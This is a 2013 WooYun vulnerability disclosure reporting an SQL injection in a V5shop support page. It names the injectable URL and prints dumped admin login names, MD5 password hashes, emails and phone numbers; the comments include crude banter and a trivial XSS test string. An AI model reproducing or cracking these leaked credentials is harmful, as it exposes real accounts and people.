当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035582

漏洞标题:V5shop某分站存在SQL注入可导致后台与电商客户网站信息泄漏

相关厂商:V5shop

漏洞作者: Black Angel

提交时间:2013-08-29 15:38

修复时间:2013-09-03 15:39

公开时间:2013-09-03 15:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-29: 细节已通知厂商并且等待厂商处理中
2013-09-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

V5shop某分站注入,导致同服所有网站数据泄露乃至拖库风险!
这个必须得发礼物.!

详细说明:

http://service.v5shop.com/Help.aspx?id=462
Count(*) of [service.v5shop.com]..[Ad_Admin] is 9
Data Found: LoginName=admin
Data Found: LoginPass=BD99870E433FD8ECAD10BFBB1CC67D44
Data Found: Name=
Data Found: Phone=
Data Found: QQ=
Data Found: Email=
Data Found: LoginName=chenht
Data Found: LoginPass=D553D148479A268914CECB77B2B88E6A
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=chenht@web08.net
Data Found: LoginName=chenxx
Data Found: LoginPass=D553D148479A268914CECB77B2B88E6A
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=chenxx@web08.net
Data Found: LoginName=jsjl
Data Found: LoginPass=E10ADC3949BA59ABBE56E057F20F883E
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=wanghp@v5shop.com.cn
Data Found: LoginName=shjl
Data Found: LoginPass=E10ADC3949BA59ABBE56E057F20F883E
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=wanghp@v5shop.com.cn
Data Found: LoginName=wtcl
Data Found: LoginPass=E10ADC3949BA59ABBE56E057F20F883E
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=wanghp@v5shop.com.cn
Data Found: LoginName=zl
Data Found: LoginPass=E10ADC3949BA59ABBE56E057F20F883E
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=zhulei@v5shop.com.cn
Data Found: LoginName=
Data Found: LoginPass=E10ADC3949BA59ABBE56E057F20F883E
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=zhulei@v5shop.com.cn
Data Found: LoginName=
Data Found: LoginPass=E10ADC3949BA59ABBE56E057F20F883E
Data Found: Name=
Data Found: Phone=021-88888888
Data Found: QQ=888888
Data Found: Email=zhulei@v5shop.com.cn

1.png


未进一步渗透。未拖库。
但求一礼物。

漏洞证明:

111.jpg

修复方案:

我不懂。

版权声明:转载请注明来源 Black Angel@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-03 15:39

厂商回复:

最新状态:

2013-09-08:我可以说最近出差没看见吗?可以追加20rank吗???

漏洞评价:

评论

  1. 2013-09-03 15:25 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    估计这个是忽略了,@Black Angel

  2. 2013-09-03 15:27 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @Skull 每次轮到我就这样。MBD 我的运气就那么差!

  3. 2013-09-03 20:27 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    @Black Angel 额= =。确实忽略了

  4. 2013-09-03 20:28 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    @Black Angel 估计自己修复了

  5. 2013-09-08 12:57 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @V5shop 貌似可以的 @一下xsser

  6. 2013-09-08 12:58 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @V5shop 如果要发个礼物弥补一下我受伤的心灵 我会稍微好受一点。

  7. 2013-09-08 12:59 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    已经公开了 灰常爽YY

  8. 2013-09-08 13:00 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @小痞子 表示一点也不爽。

  9. 2013-09-08 13:02 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    @Black Angel 不爽去爆z7y菊花 谢谢

  10. 2013-09-08 14:00 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @小痞子 他的菊花早已爆烂。包括sinck之类的 菊花早已爆烂了。

  11. 2013-10-03 20:17 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    膜拜大牛~

  12. 2013-10-05 16:27 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @廷廷 洗刷我呢吧,我可算不上大牛